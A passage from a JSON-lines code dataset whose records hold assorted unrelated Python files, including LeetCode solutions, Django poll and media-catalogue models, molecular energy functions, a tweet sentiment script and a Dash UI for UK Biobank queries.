obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\n\ndef search_objects_by_image_id(image_id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE image_id = ?\"\n db.execute(str(statement), (image_id,))\n result = db.fetchall()\n db.close()\n return json.dumps(result)\n\ndef search_objects_by_id(id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE image = ?\"\n db.execute(str(statement), (id,))\n result = db.fetchone()\n db.close()\n json_result = []\n if not result:\n return 0\n else:\n json_result.append(\n {\n \"id\" : result[0], \n \"class\" : result[1],\n \"name\" : result[2],\n \"image\" : result[3],\n \"confidence\" : result[4],\n \"original\" : result[5],\n }\n )\n return json.dumps(json_result)\n\ndef search_objects_by_name(name):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects WHERE class = ?\"\n db.execute(str(statement), (name,))\n result = db.fetchall()\n db.close()\n return json.dumps(result)\n\ndef insert_new_object(obj, path, original, image):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"INSERT INTO objects (class, name, image, confidence, original, created_at) VALUES (?, ?, ?, ?, ?, ?)\"\n curDateTime = datetime.datetime.now().replace(microsecond=0)\n data = (str(obj[\"class\"]), str(path), str(image), str(round(obj['confidence'] * 100)) ,str(original), str(curDateTime))\n db.execute(str(statement), data)\n con.commit()\n con.close()\n\ndef delete_object(id):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n '''statement = \"SELECT image,original FROM objects WHERE id = ?\"\n db.execute(str(statement), (id,))\n file_name = db.fetchall()\n \n statement = \"SELECT name FROM objects WHERE original = ?\"\n db.execute(str(statement), (file_name[1],))\n count = len(db.fetchall())\n \n if count == 1:\n delete_file(\"original/\" + file_name[1])\n \n delete_file(\"objs/\" + file_name[0])'''\n \n\n statement = \"DELETE FROM objects WHERE id = ?\"\n db.execute(str(statement), (id,))\n con.commit()\n con.close()\n \n\ndef delete_file(file_name):\n os.remove(\"/resources/images/\" + file_name)\n\ndef delete_all():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n\n statement = \"DELETE FROM objects\"\n db.execute(str(statement))\n \n con.commit()\n con.close()\n return 'success'\n\ndef edit(id, obj, confidence): #obj -> class\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"UPDATE objects SET class = ?, confidence = ? WHERE image = ?\"\n db.execute(str(statement), (str(obj), str(confidence), str(id)),)\n con.commit()\n con.close()\n return 'success'","sub_path":"labi2019-p2-g12/models/object_model.py","file_name":"object_model.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"185773560","text":"class Solution:\n def reverseStr(self, s: str, k: int) -> str:\n def reverse(low, high):\n while low < high:\n arr[low], arr[high] = arr[high], arr[low]\n low += 1\n high -= 1\n arr = list(s)\n i = 0\n while i < len(s):\n reverse(i, min(i+k-1, len(arr) - 1))\n i += k*2\n return ''.join(arr)\n","sub_path":"Week_09/反转字符串II.py","file_name":"反转字符串II.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426388876","text":"\"\"\"\nclick_shell.version\n\"\"\"\n\n# pylint: disable=redefined-variable-type\n\nimport datetime\nimport os\nimport subprocess\n\n\nVERSION = (2, 0, 0, 'dev', 0)\n\n\ndef get_version(version):\n \"\"\"\n Returns a PEP 440-compliant version number from VERSION.\n\n Created by modifying django.utils.version.get_version\n \"\"\"\n\n # Now build the two parts of the version number:\n # major = X.Y[.Z]\n # sub = .devN - for development releases\n # | {a|b|rc}N - for alpha, beta and rc releases\n # | .postN - for post-release releases\n\n assert len(version) == 5\n\n version_parts = version[:2] if version[2] == 0 else version[:3]\n\n # Build the first part of the version\n major = '.'.join(str(x) for x in version_parts)\n\n # Just return it if this is a final release version\n if version[3] == 'final':\n return major\n\n # Add the rest\n sub = ''.join(str(x) for x in version[3:5])\n\n if version[3] == 'dev':\n # Override the sub part. Add in a timestamp\n timestamp = get_git_changeset()\n sub = 'dev%s' % (timestamp if timestamp else version[4])\n return '%s.%s' % (major, sub)\n if version[3] == 'post':\n # We need a dot for post\n return '%s.%s' % (major, sub)\n elif version[3] in ('a', 'b', 'rc'):\n # No dot for these\n return '%s%s' % (major, sub)\n else:\n raise ValueError('Invalid version: %s' % str(version))\n\n\n# Borrowed directly from django\ndef get_git_changeset():\n \"\"\"Returns a numeric identifier of the latest git changeset.\n\n The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.\n This value isn't guaranteed to be unique, but collisions are very unlikely,\n so it's sufficient for generating the development version numbers.\n \"\"\"\n repo_dir = os.path.dirname(os.path.abspath(__file__))\n git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n shell=True, cwd=repo_dir, universal_newlines=True)\n timestamp = git_log.communicate()[0]\n try:\n timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))\n return timestamp.strftime('%Y%m%d%H%M%S')\n except ValueError:\n return None\n\n__version__ = get_version(VERSION)\n","sub_path":"click_shell/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242123025","text":"from typing import Union\n\nfrom ..call_builder import BaseCallBuilder\nfrom ..client.base_async_client import BaseAsyncClient\nfrom ..client.base_sync_client import BaseSyncClient\n\n\nclass OffersCallBuilder(BaseCallBuilder):\n \"\"\" Creates a new :class:`OffersCallBuilder` pointed to server defined by horizon_url.\n Do not create this object directly, use :func:`stellar_sdk.server.Server.offers`.\n\n See `Offers for Account `_\n\n :param horizon_url: Horizon server URL.\n :param client: The client instance used to send request.\n :param account_id: Account ID.\n \"\"\"\n\n def __init__(\n self,\n horizon_url: str,\n client: Union[BaseAsyncClient, BaseSyncClient],\n account_id: str,\n ) -> None:\n super().__init__(horizon_url, client)\n self.endpoint: str = \"accounts/{account_id}/offers\".format(\n account_id=account_id\n )\n","sub_path":"stellar_sdk/call_builder/offers_call_builder.py","file_name":"offers_call_builder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574304805","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*-\n\nimport sys\nimport re\nimport datetime\nimport time\nimport MeCab\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 2:\n print (\"Usage: \",sys.argv[0], \"filename\")\n quit()\n\n filename = sys.argv[1]#tweet.1.txt\n\n f = open(filename)\n #f = open(filename)\n line = f.readline().rstrip()\n days = {}#key->日付 value->その日のツイート文字列を全て連結したもの(ツイートの区切りは。(適当))\n days_count = {}#key->日付 value->その日のツイート数\n\n while line:\n air = line.split(\" \")\n hu = line.split(\" JST \")\n hurf = re.sub(re.compile(\"[!-~]\"), '', hu[1])\n\n if air[0] not in days:\n days[air[0]] = hurf\n days_count[air[0]] = 1\n else:\n days[air[0]] = days[air[0]] + hurf\n days_count[air[0]] += 1\n line = f.readline().rstrip()\n\n #print (\"2014-11-25 ツイート数\"+str(days_count[\"2014-11-25\"])+\"\\n\"+days[\"2014-11-25\"]+\"\\n\")\n #print (\"2014-11-26 ツイート数\"+str(days_count[\"2014-11-26\"])+\"\\n\"+days[\"2014-11-26\"]+\"\\n\")\n f.close()\n mecab = MeCab.Tagger('-Ochasen')\n node = mecab.parseToNode(days[\"2014-11-26\"])#nodeに文章を分解\n\n ld = open(\"pnName.txt\" )#名詞辞書読み込み\n names = ld.readlines()\n\n\n days_score = {}#その日のネガポジスコア平均\n score = 0\n num_score = 0\n while node:\n fs = node.feature.split(\",\")\n #print(node.surface, node.feature, sep='\\t')\n #print(node.surface)\n if fs[0] == \"名詞\":\n \n for name in names:\n \n if name.find(node.surface) >= 0:\n nm = re.split(r'[\\t]', name)\n if node.surface == nm[0]:\n #print (nm[0]+\" \"+nm[1])\n if nm[1] == 'p': score = 1.0\n elif nm[1] == 'e': score = 0.5\n elif nm[1] == 'n': score = 0.0\n num_score += score\n\n node = node.next\n\n days_score[\"2014-11-26\"] = num_score/days_count[\"2014-11-26\"]\n\n print (days_score[\"2014-11-26\"])\n\n ld.close()\n","sub_path":"old_file/line1.py","file_name":"line1.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194804653","text":"# https://open.kattis.com/problems/rectanglearea\nfrom typing import List\n\n\ndef solution(r: List[float]) -> float:\n x1, y1, x2, y2 = r\n w = abs(x2 - x1)\n h = abs(y2 - y1)\n return w * h\n\n# def test_1():\n# assert solution([0.0, 0.0, 3.0, 4.0]) == 12.000\n#\n# def test_2():\n# assert solution([5.2, -4.64, -3.47, 2.2]) == 59.303\n\nif __name__ == '__main__':\n print(solution(list(map(float, input().split(' ')))))\n\n","sub_path":"python/1_6/rectanglearea.py","file_name":"rectanglearea.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"503286156","text":"def handshake(n):\n if type(n) is int:\n n = \"{0:b}\".format(n)\n elif type(n) is str:\n u = n.replace('0', '')\n u = u.replace('1', '')\n if len(u) > 0:\n return []\n\n facs = factors(int(n), len(n))\n\n out = []\n rev = False\n for fac in facs:\n if fac == 1:\n out.append('wink')\n elif fac == 10:\n out.append('double blink')\n elif fac == 100:\n out.append('close your eyes')\n elif fac == 1000:\n out.append('jump')\n elif fac == 10000:\n rev = True\n\n if rev:\n out.reverse()\n\n return out\n\ndef code(lst):\n out = []\n for l in lst:\n if l == 'wink':\n if len(out) > 0 and out[-1] > 1 and 10000 not in out:\n out.append(10000)\n out.append(1)\n elif l == 'double blink':\n if len(out) > 0 and out[-1] > 10 and 10000 not in out:\n out.append(10000)\n out.append(10)\n elif l == 'close your eyes':\n if len(out) > 0 and out[-1] > 100 and 10000 not in out:\n out.append(10000)\n out.append(100)\n elif l == 'jump':\n if len(out) > 0 and out[-1] > 1000 and 10000 not in out:\n out.append(10000)\n out.append(1000)\n elif l == 'sneeze':\n out.append(-1)\n\n return str(sum(out))\n\ndef factors(n, l):\n out = []\n\n for i in range(l - 1, 0, -1):\n out.append(n - n % 10**i)\n n = n - out[-1]\n out.append(n)\n\n out.reverse()\n return out\n","sub_path":"python/secret-handshake/handshake.py","file_name":"handshake.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"432416104","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.datastructures import MultiValueDictKeyError\n\nfrom .models import Question, Choice\n\n#1. widok wszystkich opublikowanych pytań\ndef index(request):\n questions = Question.objects.all()\n title = 'Lista wszystkich pytań'\n\n context = {\n 'questions': questions,\n 'title': title,\n }\n\n return render(request,'polls/index.html', context)\n\n#2. widok szczegółowy danego pytania\ndef detail(request, question_id):\n #question = Question.objects.get(id = question_id)\n question = get_object_or_404(Question, id = question_id)\n title = f'Pytanie: {question.question_text}'\n\n context = {\n 'question': question,\n 'title': title,\n }\n\n return render(request,'polls/detail.html', context)\n\n\n#3. widok, który reaguje na zagłosowanie przez usera\ndef vote(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n\n # if request.method == \"POST\": # usuwamy gdyż poniżej implementujemy, że niechciane wartości będą puste\n # choice_form = request.POST['choice']\n choice_form = request.POST.get('choice')\n #jeśli nie ma przyjmie wartosc NaN czyli Null\n\n # try:\n # choice_form = request.POST['choice']\n # except MultiValueDictKeyError:\n # return redirect('polls:detail', question_id)\n\n try:\n selected_choice = question.choice_set.get(id=choice_form)\n except Choice.DoesNotExist:\n return redirect('polls:detail', question_id)\n\n selected_choice.votes += 1\n selected_choice.save()\n\n return redirect('polls:results', question_id)\n\n#4. widok z wynikami dla danego pytania\ndef results(request, question_id):\n #question = Question.objects.get(id = question_id)\n question = get_object_or_404(Question, id = question_id)\n title = f'Wyniki: {question.question_text}'\n\n context = {\n 'question': question,\n 'title': title,\n }\n\n return render(request,'polls/results.html', context)\n\n\n\n\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574733031","text":"import tree\r\nimport copy\r\nimport random\r\n\r\ndef reduce(root):\r\n for child in root.get_children():\r\n root.add_leaf_node(reduce(child))\r\n for child in root.get_children():\r\n root.remove_child(child)\r\n root.sort_leafs()\r\n name = \"\".join([leaf.get_name() for leaf in root.get_leafs()])\r\n probability = root.get_probability()\r\n cost = root.get_cost()\r\n return tree.Leaf(name, probability, cost, parent=root.get_parent())\r\n\r\ndef run(root=None, expression=None, vals=None, out=False):\r\n if not(expression) and not(root):\r\n random.seed(100)\r\n vals = {x:{\"probability\":random.random(), \"cost\":random.random()}\r\n for val,x in enumerate(\"abcdefghijklmnopqrstuvwxyz\")}\r\n\r\n expression = \"a|(b&c&(d|e|(f&g))&(h|i))|(j&k&l&(m|n|((o|p)&(q|r))))\"\r\n expression = \"(((a|b)&(c|d))|((e|f)&(g|h)))&(((i|j)&(k|l))|((m|n)&(o|p)))\"\r\n \r\n print(\"Original Tree: \")\r\n root = tree.create_tree(expression, vals=vals)\r\n\r\n leaf = reduce(copy.deepcopy(root))\r\n\r\n print(\"Strategy: {}\".format(leaf.get_name()))\r\n print(\"Cost: {}\".format(round(leaf.get_cost(),7)))\r\n print(\"Probability: {}\".format(round(leaf.get_probability(),7)))\r\n","sub_path":"DFA and DynProg Runner/DFA.py","file_name":"DFA.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345617294","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\nfrom django.contrib import admin\nfrom datetime import datetime\nfrom django.utils import timezone\n# Create your models here.\n\nclass cms(models.Model):\n cms_id = models.CharField(max_length= 100, blank=False)\n cms_name = models.CharField(max_length= 100, blank=False)\n is_active = models.BooleanField(default=False, blank=False)\n\n def __str__(self):\n return self.cms_name\n\n class Meta:\n verbose_name = \"Youtube CMS\"\n verbose_name_plural = \"Youtube CMS(s)\"\n\n\nclass channel(models.Model):\n channel_id = models.CharField(max_length= 100, blank=False)\n channel_name = models.CharField(max_length= 100, blank=False)\n cms_id \t\t = models.ForeignKey(cms, primary_key=False, on_delete=models.CASCADE)\n is_Affiliate_Channel = models.BooleanField(default=False, blank=False)\n is_active \t = models.BooleanField(default=False, blank=False)\n remarks \t\t = models.TextField(default=True, blank=True)\n\n def __str__(self):\n return self.channel_name\n\n class Meta:\n verbose_name = \"Youtube Channel\"\n verbose_name_plural = \"Youtube Channels\"\n\n\nclass facebook(models.Model):\n page_id = models.CharField(max_length= 100, blank=False) \n page_name = models.CharField(max_length= 100, blank=False)\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 100, blank=False)\n sub_catagory = models.CharField(max_length= 100, blank=False)\n fans = models.PositiveIntegerField( blank=False, default=0)\n ptat = models.PositiveIntegerField( blank=False, default=0)\n token = models.TextField(blank=True)\n tags \t = models.TextField(default=True, blank = True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n created_on = models.DateField( (\"Date\"), auto_now_add=True, blank=False )\n\n def __str__(self):\n return self.page_name\n\n class Meta:\n verbose_name = \"Facebook Page\"\n verbose_name_plural = \"Facebook Pages\"\n\n\nclass instagram(models.Model):\n CHOICES_CATAGORY = (('AM', 'Arts Marketing'),('EP', 'Event Planning'),)\n handle = models.CharField(max_length= 100, blank=False) \n account_name = models.CharField(max_length= 100, blank=False)\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 2, choices=CHOICES_CATAGORY, blank=True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n\n def __str__(self):\n return self.account_name\n\n class Meta:\n verbose_name = \"Instagram Account\"\n verbose_name_plural = \"Instagram Accounts\"\t\n\n\nclass twitter(models.Model):\n CHOICES_CATAGORY = (('AM', 'Arts Marketing'),('EP', 'Event Planning'),)\n handle = models.CharField(max_length= 100, blank=False) \n account_name = models.CharField(max_length= 100, blank=False)\t\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 2, choices = CHOICES_CATAGORY, blank = True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n\n def __str__(self):\n return self.account_name\n\n class Meta:\n verbose_name = \"Twitter Handle\"\n verbose_name_plural = \"Twitter Handles\"\t\n\n\nclass youtube_videos(models.Model):\n SPAM_LEVEL = (\n ('NA','None'),\n ('TN','Thumbnail'),\n ('MT','Meta'),\n ('CM','Comma'),\n ('ML','Multiple'),\n )\n\n VIDEO_STATUS = (\n (\"PR\",\"private\"),\n (\"PB\",\"public\"),\n (\"PL\",\"published\"),\n )\n\n channel_id_fk = models.ForeignKey(channel, blank=False, verbose_name=\"Select Channel\", on_delete=models.CASCADE)\n video_id = models.CharField(max_length=30, blank=False, verbose_name=\"Video ID As In Youtube\")\n video_title = models.CharField(max_length=250, blank=False, verbose_name=\"Video Title\")\n thumbnail = models.CharField(max_length=50, default=\"\", blank=True, verbose_name=\"Thumbnail URL\")\n video_description = models.TextField(default=False, blank=False, verbose_name=\"Video Description\")\n video_tags = models.TextField(default=False, blank=False, verbose_name=\"Video Tags\")\n video_status = models.CharField( max_length = 2, choices = VIDEO_STATUS, blank=False, verbose_name=\"Video Status\")\n video_published_at = models.DateTimeField( default=datetime.now, blank=True, verbose_name=\"Video Published Time\")\n spam_level = models.CharField( max_length = 2, choices = SPAM_LEVEL, default='NA', blank=True )\n qc_action = models.BooleanField( default=False, blank=True )\n\n def __str__(self):\n return \"%s\" % (self.video_title)\n\n class Meta:\n verbose_name=\"Youtube Video\"\n verbose_name_plural = \"Youtube Videos\"\n\n","sub_path":"property/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248455170","text":"import numpy as np\nfrom abc import ABC, abstractmethod\n\nclass EnergyFunction(ABC):\n \"\"\"This class is an abstract class for all the energy functions that are\n going to be written. All energy functions that inherit this structure MUST\n have a calc_energy method and a cutoff_correction method.\n \"\"\"\n\n @abstractmethod\n def calc_energy(self):\n pass\n\n @abstractmethod\n def cutoff_correction(self):\n pass\n\nclass LJ(EnergyFunction):\n \"\"\"Setup for the Lennard-Jones potential.\n\n Parameters\n ----------\n epsilon: float, int\n sigma: float, int\n \"\"\"\n\n def __init__(self, epsilon: (int, float) = 0.5,\n sigma: (int, float) = 1.0):\n self.sigma = float(sigma)\n self.epsilon = float(epsilon)\n\n def calc_energy(self, r):\n return (4 * self.epsilon * ((self.sigma / r) ** 12\n - (self.sigma / r) ** 6))\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n return(0)\n\nclass Buckingham(EnergyFunction):\n \"\"\"Set-up for the Buckingham potential.\n \n Parameters\n ----------\n rho: float, int\n a: float, int\n c: float, int\n \"\"\"\n\n def __init__(self, rho: (int, float) = 1.0, a: (int, float) = 1.0,\n c: (int, float) = 1.0):\n self.rho = float(rho)\n self.a = float(a)\n self.c = float(c)\n\n def calc_energy(self, r):\n return self.a * np.exp(-r / self.rho) - self.c / r ** 6\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n return(0)\n\nclass UnitlessLJ(EnergyFunction):\n \"\"\"Set-up for the Buckingham potential.\n \n Parameters\n ----------\n r: float, int\n \"\"\"\n\n def __init__(self):\n pass\n\n def calc_energy(self, r: (int, float) = None):\n return 4.0 * (np.power(1 / r, 12)\n - np.power(1 / r, 6))\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n volume = np.power(box_length, 3)\n sig_by_cutoff3 = np.power(1.0 / cutoff, 3)\n sig_by_cutoff9 = np.power(sig_by_cutoff3, 3)\n e_correction = sig_by_cutoff9 - 3.0 * sig_by_cutoff3\n\n e_correction *= 8.0 / 9.0 * np.pi * number_particles / volume * number_particles\n\n return e_correction\n\n\nclass potentialEnergyFactory:\n def __init__(self):\n self.methods = {'LJ': LJ,\n 'Buckingham': Buckingham,\n 'UnitlessLJ': UnitlessLJ,\n }\n\n def build_energy_method(self, potential_type, **kwargs):\n energy_class = self.methods[potential_type](**kwargs)\n\n return (energy_class)\n\n\nclass Energy:\n def __init__(self, potential_type='UnitlessLJ', simulation_cutoff=3.0,\n **kwargs):\n self.energy_obj = potentialEnergyFactory().build_energy_method(\n potential_type, **kwargs)\n self.simulation_cutoff = simulation_cutoff\n\n def calculate_tail_correction(self, number_particles, box_length):\n \"\"\"This function computes the standard tail energy correction for the LJ potential\n Parameters\n ----------\n box_length : float, int\n length of of side of the simulation box (cube)\n cutoff: float, int\n the cutoff for the tail energy truncation\n num_particles: int\n number of particles\n Returns\n -------\n e_correction: float\n tail correction of energy\n \"\"\"\n e_correction = self.energy_obj.cutoff_correction(\n self.simulation_cutoff, number_particles, box_length)\n return e_correction\n\n def _minimum_image_distance(self, r_i, r_j, box_length):\n \"\"\"\n Calculates the shortest distance between a particle and another\n instance in a periodic boundary condition image\n Parameters\n ----------\n r_i: np.array([n,3])\n The x, y, z coordinates for a particle, i.\n r_j: np.array([n,3])\n The x, y, z coordinates for a particle, j.\n box_length: float, int\n The length of a side of the side box for the periodic boundary.\n Returns\n -------\n rij2: np.array([n,3])\n The minimum image distance between the two particles, r_i and r_j.\n \"\"\"\n # This function computes the minimum image distance between two particles\n rij = r_i - r_j\n rij = rij - box_length * np.round(rij / box_length)\n rij2 = np.dot(rij, rij)\n distance = np.sqrt(rij2)\n\n return distance\n\n def calculate_initial_energy(self, coordinates, box_length):\n \"\"\"Iterates over a set of coordinates to calculate total system energy\n This function computes the sum of all pairwise VDW energy between each\n pair of particles in the system. This is the first instance of the\n energy calculation. Subsequent uses call calculate_pair_energy.\n Parameters\n ----------\n coordinates : np.array([n,3])\n An array of atomic coordinates. Size should be [n, 3] where n is the\n number of particles.\n box_length : float\n A float indicating the size of the simulation box. Can be either\n hard-coded or calculated using num_particles and reduced_density.\n cutoff: float\n The square of the simulation_cutoff, which is the cutoff distance\n between two interacting particles.\n i_particle: int\n Intitial particle for pairwise count\n Returns\n -------\n e_total : float\n The sum of all pairwise VDW energy between each pair of particles in\n the system.\n \"\"\"\n e_total = 0.0\n particle_count = len(coordinates)\n for i_particle in range(particle_count):\n for j_particle in range(i_particle):\n r_i = coordinates[i_particle]\n r_j = coordinates[j_particle]\n rij = self._minimum_image_distance(r_i, r_j, box_length)\n if rij < self.simulation_cutoff:\n e_pair = self.energy_obj.calc_energy(rij)\n e_total += e_pair\n return e_total\n\n def calculate_pair_energy(self, coordinates, box_length, i_particle):\n \"\"\"This function computes the sum of all pairwise VDW energy between each\n pair of particles in the system.\n Parameters\n ----------\n coordinates : np.array\n An array of atomic coordinates. Size should be (n, 3) where n is the\n number of particles.\n box_length : float\n A float indicating the size of the simulation box. Can be either\n hard-coded or calculated using num_particles and reduced_density.\n cutoff: float\n The square of the simulation_cutoff, which is the cutoff distance between\n two interacting particles.\n i_particle: integer\n Intitial particle for pairwise count\n Returns\n -------\n e_total : float\n The sum of all pairwise VDW energy between each pair of particles in\n the system.\n \"\"\"\n\n # This function computes the energy of a particle with\n # the rest of the system\n\n e_total = 0.0\n\n i_position = coordinates[i_particle]\n\n particle_count = len(coordinates)\n\n for j_particle in range(particle_count):\n\n if i_particle != j_particle:\n\n j_position = coordinates[j_particle]\n\n rij = self._minimum_image_distance(i_position, j_position,\n box_length)\n\n if rij < self.simulation_cutoff:\n e_pair = self.energy_obj.calc_energy(rij)\n e_total += e_pair\n return e_total\n\n\ndef main():\n energy_factory = potentialEnergyFactory()\n lj_energy = energy_factory.build_energy_method('UnitlessLJ')\n print(lj_energy.calc_energy(2.0))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"mm_2019_sss_2/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515665754","text":"import requests\nimport pandas as pd\nimport json\nimport sqlalchemy as db\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport yaml\nimport io\nfrom flask import send_file\nimport base64\n\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\n\ndbname = 'ukb'\nhost = '127.0.0.1'\nport = 5432\nuser = 'test'\npassword = 'puthis in some env please'\n\nconnectstring = \"postgresql://\" + user + \":\" + password + \"@\" + host + \"/\" + dbname\ndb_engine = db.create_engine(connectstring, echo=False)\n\n#headers = {\n#'Accept': 'application/json',\n#}\n#response = requests.get('http://127.0.0.1:5000/ukbrest/api/v1.0/phenotype/fields', headers=headers)\n#r = json.loads(response.text)\n\n#dashapp.layout = html.Div(\"UKBiobank query tool\")\n\nsql_st = '''\nselect column_name, description\nFROM fields\n'''\np = results_iterator = pd.read_sql(\n sql_st, db_engine\n)\n\ndefaultcols = ['c31_0_0', 'c34_0_0', 'c52_0_0'] # Sex, yob, mob\nsamples_filters = ['eid > 0']\n\ncolnames = []\nfor ix, row in p.iterrows():\n readble_col_desc = row['description'] + '_' + row['column_name']\n colnames.append({'label': readble_col_desc, 'value': row['column_name']})\n\n\nsearchbox = dbc.Container(\n [\n dcc.Store(id='yaml-store-id'),\n html.Div(id='hidden-div-id', style={'display':'none'}),\n html.H2(\"Select columns\"),\n dcc.Dropdown(options=colnames, id='columnsearch-id', multi=True, \n value=['sex_c31_0_0', 'c31_0_0']),\n html.P(),\n ])\n\n\ndata = dbc.Container([ \n html.P(),\n dbc.Textarea(\n placeholder='...',\n value='',\n style={'width': '100%', 'height': '45%'},\n id='yaml-id', bs_size=\"md\"\n ),\n html.P(), \n html.A(\"Download YAML\", id='download-url-id', href=\"\", download=\"Download.yml\") \n ])\n\n\napp.layout = html.Div([searchbox, data])\n\n@app.callback(\n Output(component_id='yaml-id', component_property='value'), \n [Input(component_id='columnsearch-id', component_property='value')]\n)\ndef getdata(columnsearchvals):\n df = pd.DataFrame(colnames)\n searchcols = defaultcols + columnsearchvals\n df = df[df['value'].isin(searchcols)]\n dictcols = {'data': dict(zip(df['label'], df['value']) )}\n dictfilter = {'samples_filters': samples_filters}\n dictcols.update(dictfilter)\n #global datayaml \n datayaml = yaml.dump(dictcols)\n return datayaml\n\n\n@app.callback(\n Output(component_id='download-url-id', component_property='href'), \n [Input(component_id='yaml-id', component_property='value')],\n)\n\ndef download(yaml):\n b64 = base64.b64encode(yaml.encode()).decode() # some strings <-> bytes conversions necessary here\n return f'data:file/yml;base64,{b64}'\n\n#headers = {\n#'Accept': 'application/json',\n#}\n#response = requests.get('http://p23-services:5000/ukbrest/api/v1.0/phenotype/', headers=headers)\n#r = json.loads(response.text)\n\n#curl -X POST -H \"Accept: text/csv\" -F file=@get_freesurfer.yaml -F section=data http://p23-services:5000/ukbrest/api/v1.0/query\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","sub_path":"app_ui.py","file_name":"app_ui.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"550914874","text":"class Solution:\n #solution 1\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n return self.maxArea(heights, 0, len(heights) - 1)\n\n def maxArea(self, heights, s, e):\n if s > e:\n return 0\n if s == e:\n return heights[s]\n m = (s + e) // 2\n leftmax = self.maxArea(heights, s, m)\n rightmax = self.maxArea(heights, m + 1, e)\n midmax = self.midmaxArea(heights, s, m, e)\n return max(leftmax, rightmax, midmax)\n\n def midmaxArea(self, heights, s, m, e):\n area = 0\n i = m\n j = m + 1\n h = min(heights[i], heights[j])\n while i >= s and j <= e:\n h = min(h, heights[i], heights[j])\n area = max(area, h * (j - i + 1))\n if i == s:\n j += 1\n elif j == e:\n i -= 1\n else:\n if heights[i - 1] > heights[j + 1]:\n i -= 1\n else:\n j += 1\n return area\n\n #solution 2\n def largestRectangleAreaV2(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n heights.append(0)\n stack = [-1]\n ans = 0\n for i in range(len(heights)):\n while heights[i] < heights[stack[-1]]:\n h = heights[stack.pop()]\n w = i - stack[-1] - 1\n ans = max(ans, h * w)\n stack.append(i)\n heights.pop()\n return ans\n\n \n\n\nif __name__ == '__main__':\n heights = [2, 1, 5, 6, 2, 3]\n print(Solution().largestRectangleAreaV2(heights))","sub_path":"84LargestRectangleInHistogram/84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410073912","text":"import pygame\nfrom gui import updatable\n\nclass Entity(updatable.Updatable):\n \"\"\"Each object in the game is an entity. It has a sprite, and an animation of two frames.\n\n Members :\n * sprite : picture representing currently the entity\n * screen : display zone where the entity is printed\n * x, y : position\n * next_image : picture to print on the next update\n \"\"\"\n\n _sprite = None\n _screen = None\n\n _x = None\n _y = None\n _next_image 